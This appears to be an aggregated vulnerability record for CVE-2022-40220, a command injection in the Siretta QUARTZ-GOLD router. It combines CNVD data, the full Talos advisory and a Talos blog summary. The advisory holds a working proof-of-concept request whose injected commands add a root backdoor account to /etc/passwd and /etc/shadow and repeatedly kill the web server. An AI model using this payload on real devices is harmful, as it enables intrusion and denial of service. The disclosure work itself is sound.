An OS command injection vulnerability exists in the httpd txt/restore.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability.
{"cnvd": [{"lastseen": "2023-03-15T05:25:02", "description": "Siretta QUARTZ-GOLD is a high-speed dual-port Gigabit Ethernet industrial router from Siretta.The Siretta QUARTZ-GOLD is vulnerable to an operating system command injection vulnerability that could be exploited by an attacker to cause arbitrary command execution by sending a crafted network request.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-30T00:00:00", "type": "cnvd", "title": "Siretta QUARTZ-GOLD OS Command Injection Vulnerability (CNVD-2023-17082)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-40220"], "modified": "2023-03-14T00:00:00", "id": "CNVD-2023-17082", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2023-17082", "cvss": {"score": 0.0, "vector": "NONE"}}], "talos": [{"lastseen": "2023-06-03T15:19:44", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1612\n\n## Siretta QUARTZ-GOLD httpd txt/restore.cgi OS command injection vulnerability\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-40220\n\n##### SUMMARY\n\nAn OS command injection vulnerability exists in the httpd txt/restore.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. 
An attacker can send an HTTP request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020\n\n##### PRODUCT URLS\n\nQUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-78 - Improper Neutralization of Special Elements used in an OS Command (\u2018OS Command Injection\u2019)\n\n##### DETAILS\n\nThe Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP, LTE, WAN failover, and many others.\n\nThe QUARTZ-GOLD router has a web server with several functionalities. One functionality sets several nvram variables and then reboots the router.\n\nThis functionality is allowed through the `txt/restore.cgi` API. 
The following is one of the functions involved in executing this API:\n \n \n void wi_restore_custom(char* url,size_t len)\n \n {\n [...]\n \n read_len = len;\n [...]\n tmp_dir_path[0] = '\\0';\n data_pointer = (void *)skip_header(&read_len);\n if (data_pointer != (void *)0x0) {\n [...]\n data_pointer = malloc(read_len);\n [...]\n is_same = web_read(data_pointer,read_len);\n read_len = read_len - is_same;\n strcpy(tmp_dir_path,\"/tmp/nvram_restoreXXXXXX\");\n mktemp(tmp_dir_path);\n iVar1 = f_write(tmp_dir_path,data_pointer,is_same,0,0x180); [1]\n [...]\n tmp_dir_fd = fopen(tmp_dir_path,\"r\");\n if (tmp_dir_fd != (FILE *)0x0) {\n while (buffer = fgets(web_data,0x200,tmp_dir_fd), buffer != (char *)0x0) {\n buffer = strdup(web_data);\n if (buffer == (char *)0x0) goto LAB_00016940;\n is_same = _vstrsep(buffer,\"=\",&nvram_key,&nvram_value,0); [2]\n if ((((1 < is_same) && (is_same = strcmp(nvram_key,\"routersn\"), is_same != 0)) &&\n (is_same = strcmp(nvram_key,\"et0macaddr\"), is_same != 0)) &&\n (((is_same = strcmp(nvram_key,\"lan_hwaddr\"), is_same != 0 &&\n (is_same = strcmp(nvram_key,\"wan_hwaddr\"), is_same != 0)) &&\n (is_same = strcmp(nvram_key,\"wl0_hwaddr\"), is_same != 0)))) {\n sprintf(system_command,\"nvram set %s=%s\",nvram_key,nvram_value); [3]\n system(system_command); [4]\n memset(web_data,0,0x200);\n [...]\n }\n [...]\n }\n \n\n`wi_restore_custom` will, at `[1]`, write the request\u2019s body into a temporary file. The request\u2019s body should contain a series of lines in the `<nvram_key>=<nvram_value>` format. Indeed, at `[2]`, a line of the request\u2019s body is parsed and split into two parts: the nvram key and the nvram value. At `[3]` the `nvram set <parsed_nvram_key>=<parsed_nvram_value>` string is composed; it is then executed at `[4]` using the `system` function.\n\nNo command injection related checks are performed on what are supposed to be the `nvram_key` and the `nvram_value`. 
This means that any value will reach the `system` function without command injection related checks. Because of this the `wi_restore_custom` function is vulnerable to an OS command injection. This vulnerability can lead to arbitrary command execution.\n\n### Exploit Proof of Concept\n\nSending a request like the following:\n \n \n POST /txt/restore.cgi?_http_id=<a valid TID> HTTP/1.1\n Authorization: Basic <a valid basic auth>\n Content-Length: 428\n Content-Type: multipart/form-data; boundary=c6ced257295a2b54067e956663d1fbda\n \n --c6ced257295a2b54067e956663d1fbda\n Content-Disposition: form-data; name=\"content\"; filename=\"content\"\n \n AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA `echo \"\">>/etc/passwd; echo \"poc:x:0:0:root:/root:/bin/sh\" >> /etc/passwd; echo \"\" >> /etc/shadow; echo 'poc:$1$HSeR2q0g$KOjqL5H5DKyLpf0H1apr51:0:0:99999:7:0:0:'>> /etc/shadow; while [ 1 ]; do killall httpd; done`=POC\n --c6ced257295a2b54067e956663d1fbda--\n \n\nIf the request was successful, it is now possible to access the device using `poc:admin` as credentials. 
For instance, connecting via telnet to port 2323, we can supply the injected credentials:\n \n \n telnet 192.168.0.1 2323\n Trying 192.168.0.1...\n Connected to 192.168.0.1.\n Escape character is '^]'.\n QUARTZ-GOLD login: poc\n Password: \n \n root@QUARTZ-GOLD:/tmp/home/root#\n \n\n##### TIMELINE\n\n2022-10-14 - Initial Vendor Contact\n\n2022-10-20 - Vendor Disclosure\n\n2022-11-24 - Vendor Patch Release\n\n2023-01-26 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T00:00:00", "type": "talos", "title": "Siretta QUARTZ-GOLD httpd txt/restore.cgi OS command injection vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-40220"], "modified": "2023-01-26T00:00:00", "id": "TALOS-2022-1612", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1612", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2023-02-02T20:12:34", 
"description": "\n\n_Francesco Benvenuto of Cisco Talos discovered these vulnerabilities._\n\nCisco Talos recently discovered several vulnerabilities in the Siretta Quartz-Gold router. Talos also discovered vulnerabilities in FreshTomato while investigating the Siretta router.\n\nThe Siretta Quartz-Gold is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others. FreshTomato is an open source firmware based on Linux. The firmware offers several features for Broadcom-based routers.\n\n### Quartz-Gold Vulnerabilities\n\nSeveral OS command injection vulnerabilities were found which could lead to arbitrary command execution, making them all high risk. [TALOS-2022-1607](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1607>) (CVE-2022-40969) and [TALOS-2022-1612](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1612>) (CVE-2022-40220) can be triggered with HTTP requests, while [TALOS-2022-1615](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1615>) (CVE-2022-38066), [TALOS-2022-1638](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1638>) (CVE-2022-40222) and [TALOS-2022-1640](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1640>) (CVE-2022-42490-CVE-2022-42493) can each be triggered with a network request.\n\nThree directory traversals were recorded in QUARTZ-GOLD, [TALOS-2022-1606](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1606>) (CVE-2022-40701) and [TALOS-2022-1637](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1637>) (CVE-2022-41154), which can lead to arbitrary file deletion. Advisory 1637 has a higher CVSS risk rating and can be triggered by a network request. 
[TALOS-2022-1609](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1609>) (CVE-2022-38088) can lead to arbitrary file read.\n\nThree stack-based buffer overflows were found: [TALOS-2022-1605](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1605>) (CVE-2022-36279) and [TALOS-2022-1608](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1608>) (CVE-2022-38459) can lead to remote code execution, triggered by an HTTP request. [TALOS-2022-1613](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1613>) (CVE-2022-40985-CVE-2022-41030) can lead to arbitrary command execution and is triggered by a sequence of requests.\n\nA heap-based buffer overflow vulnerability was also reported in [TALOS-2022-1639](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1639>) (CVE-2022-41991), which can be triggered by a network request.\n\nTwo other vulnerabilities were discovered, including [TALOS-2022-1610](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1610>) (CVE-2022-38715), a leftover debug code that can lead to remote code execution, and [TALOS-2022-1611](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1611>) (CVE-2022-39045), a file write vulnerability that can lead to arbitrary file upload. Both can be triggered by HTTP requests.\n\n### FreshTomato Vulnerabilities\n\nIn FreshTomato, there is [TALOS-2022-1641](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1641>) (CVE-2022-42484), an OS command injection vulnerability and a directory traversal vulnerability, [TALOS-2022-1642](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1642>) (CVE-2022-38451). 
An attacker can send an HTTP request to trigger these vulnerabilities.\n\nCisco Talos worked with Siretta and FreshTomato to ensure that these issues were resolved and an update is available for affected customers, all in adherence to [Cisco's vulnerability disclosure policy](<https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html>).\n\nUsers are encouraged to update these affected products as soon as possible: Siretta QUARTZ-GOLD G5.0.1.5-210720-141020, FreshTomato 2022.5, AdvancedTomato commit 67273b0. Talos tested and confirmed that these versions of the Siretta and FreshTomato products are exploitable through these vulnerabilities.\n\nThe following Snort rules will detect exploitation attempts against this vulnerability: 60649-60652, 60656-0664, 60667, 60692, 60721-60724, 60761-60763, 60771-60775, 60846-60847, 60914. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. 
For the most current rule information, please refer to your Firepower Management Center or Snort.org.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T21:26:14", "type": "talosblog", "title": "Vulnerability Spotlight: OS command injection, directory traversal and other vulnerabilities found in Siretta Quartz-Gold and FreshTomato", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-36279", "CVE-2022-38066", "CVE-2022-38088", "CVE-2022-38451", "CVE-2022-38459", "CVE-2022-38715", "CVE-2022-39045", "CVE-2022-40220", "CVE-2022-40222", "CVE-2022-40701", "CVE-2022-40969", "CVE-2022-40985", "CVE-2022-41030", "CVE-2022-41154", "CVE-2022-41991", "CVE-2022-42484", "CVE-2022-42490", "CVE-2022-42493"], "modified": "2023-01-26T21:26:14", "id": "TALOSBLOG:5A84CD5D3B3106E07A6CAFECDC1167F6", "href": "https://blog.talosintelligence.com/vulnerability-spotlight-os-command-injection-directory-traversal-and-other-vulnerabilities-found-in-siretta-quartz-gold-and-freshtomato/", "cvss": {"score": 0.0, "vector": "NONE"}}]}